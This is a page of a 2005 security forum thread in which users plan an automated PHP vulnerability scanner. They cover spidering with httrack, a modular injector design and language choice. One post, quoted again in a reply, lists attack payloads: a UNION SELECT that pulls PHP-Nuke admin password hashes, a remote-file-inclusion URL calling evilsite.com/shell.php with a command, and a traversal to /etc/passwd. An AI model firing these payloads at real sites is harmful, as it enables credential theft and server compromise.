Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 798
Members: 0
Total: 798
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> PHP Sql Injection Scanner Plan Goto page Previous  1, 2, 3  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Fri Apr 08, 2005 4:20 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




murdock wrote:
Httrack....very very nice tool Very Happy

Thanks y3dips!!!


no problemo dude,
im learning the source too Rolling Eyes , even till now im still watching HDM script (metasploit) lol

maybe if u already learn some, than u can share it with me Wink

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Apr 08, 2005 7:53 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I 'm reading the source code of the library, but it's in C and....I'm a little lost in C languange Crying or Very sad. I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutly NO IDEA of GUIs programming in VisualC++, and I need a GUI for making treeviews and itemlists Sad
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 11:59 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




yes, that the point, just save all url cache by httrack Smile n use it for your own sake
yes again, it was written in C ..
even my project will be written in PERL but i trying to understand it n do some porting Sad (if i cant, manybe i just like you, USING compiled command line version Laughing)

safe more time for your research , even it not easy to be implemented with our program n will decrease our program time during the 'compiled' program that we use (if we dont implement the source)

Wink

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 4:47 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yeah sex = 16
beer = 18 (but nobody listens to that)
Full drivers license = 16 and a half
Smoking = 18 (but nobody cares)

Yeah we have lots of fun.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sun Apr 10, 2005 12:44 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




shai-tan wrote:
Yeah sex = 16
beer = 18 (but nobody listens to that)
Full drivers license = 16 and a half
Smoking = 18 (but nobody cares)

Yeah we have lots of fun.


woops , what are you type in here shai-tan Smile Laughing

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 10, 2005 1:53 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




Shai-tan: It's like where i live, in Spain, with the difference that here sex it's at 15 years and driving at 18.

Y3dips, I have a question for you:
I read the help in the command line version of httrack but it's in complicated english for me and I didn't find how to use the parameters to get what I want, any ideas? Thanks
View user's profile Send private message
PostPosted: Tue Apr 12, 2005 8:20 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




And I can do all those things while on the net. Well except drive.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 15, 2005 12:24 am Reply with quote
dairy123
Beginner
Beginner
 
Joined: Feb 13, 2005
Posts: 4




murdock wrote:
I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I 'm reading the source code of the library, but it's in C and....I'm a little lost in C languange Crying or Very sad. I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutly NO IDEA of GUIs programming in VisualC++, and I need a GUI for making treeviews and itemlists Sad


Kind of late to this discussion but let me thrown in some ideas too. Laughing

I would say not to worry about the UI part yet, first to get the spidering - collection of URLs and arranging them etc to work. I would keep all the components as separate as possible but flexible enough to integrate them with a GUI later on. By components ( they could be as simple as a class file) I mean,

1. the part that fetches the sql injection worthy URLs and keeps them in lists - the spider, url harvester whatever you like to call it

2. the rules loader ( this will be something to help in step 1 ) which has set of rules for a given site or say a type of board - like phpbb, invision etc. Each vulnerability might be potentially written as a rule with a pattern-matching expression ? This will help determine if the URLs are sql-injection worthy (in step 1) or not

3. The actual injector - which sends in actual requests, using post or get -
to the board software - again based on some pre-written rules maybe like generic SQL qury, UNION statements etc.

4. The Interpreter - which in simplest terms is a logger of results returned by the site - (maybe a text dump or a gui based browser window) to display the results gotten from the server. in case the

each of the above components can be as small as possible and can piggy-back already existing scripts like - say the spider piggybacks on httrack - etc.

i know i am talking way over myself but just some ideas Laughing
View user's profile Send private message
PostPosted: Fri Apr 15, 2005 6:26 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




Yes dairy123! That's it!
But It will be more simple, imagine a form with 2 textboxs:

-Textbox to insert what to test with the php variable:
Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
(for a SQL Injection)
Or: "http://evilsite.com/shell.php?cmd=ls"
(for a RFI test)
Or: "../../../../../../etc/passwd"
(for directory transversal test)

-Textbox to insert the "pattern" too see if the exploit worked:
Example:
"SQL"
(if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
Or: "Infektion Shell"
(if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
Or: "root:"
(if the directory transversal worked, "root:" should appear in returnet page!)

These textbox will be free to change but i'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).

This will make the tool ready to add more exploit tricks easily.

Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks!
View user's profile Send private message
PostPosted: Sat Apr 16, 2005 12:57 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




murdock wrote:
Yes dairy123! That's it!
But It will be more simple, imagine a form with 2 textboxs:

-Textbox to insert what to test with the php variable:
Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
(for a SQL Injection)
Or: "http://evilsite.com/shell.php?cmd=ls"
(for a RFI test)
Or: "../../../../../../etc/passwd"
(for directory transversal test)

-Textbox to insert the "pattern" too see if the exploit worked:
Example:
"SQL"
(if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
Or: "Infektion Shell"
(if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
Or: "root:"
(if the directory transversal worked, "root:" should appear in returnet page!)

These textbox will be free to change but i'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).

This will make the tool ready to add more exploit tricks easily.

Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks!


hm, i found that there are some equal project we are working
what language are you using for ur project ?

maybe we can share Smile
exploit`s library maybe ?

fyi : * now im focusing on RFI first n im writing an article for echo ezine issue #11 about my project

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 16, 2005 1:32 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips?
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 1:12 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




If I were you I wouldnt use VB Id use PB Pure Basic. Download the Gambas gzip for Linux, compile and use that.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:48 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




murdock wrote:
I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips?


im going to using perl,
maybe with LWP module (give some easy way then using socket)

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 17, 2005 10:11 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Basic really is for those starting to program. We are lucky we have languages like PHP. I dont like Perl at all. I really like python though. Rather easy. I havent had experience in much programming besides php.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:00 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




In windows you can do GUI very easy, you can do it in C even in assembler, only using resources. You get a resource editor, then you make the GUI in a visual form, save de file, and then when you are going to link the program you make de resource file in.
Smile
View user's profile Send private message Send e-mail Visit poster's website
PHP Sql Injection Scanner Plan
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 2 of 3  
Goto page Previous  1, 2, 3  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.223 Seconds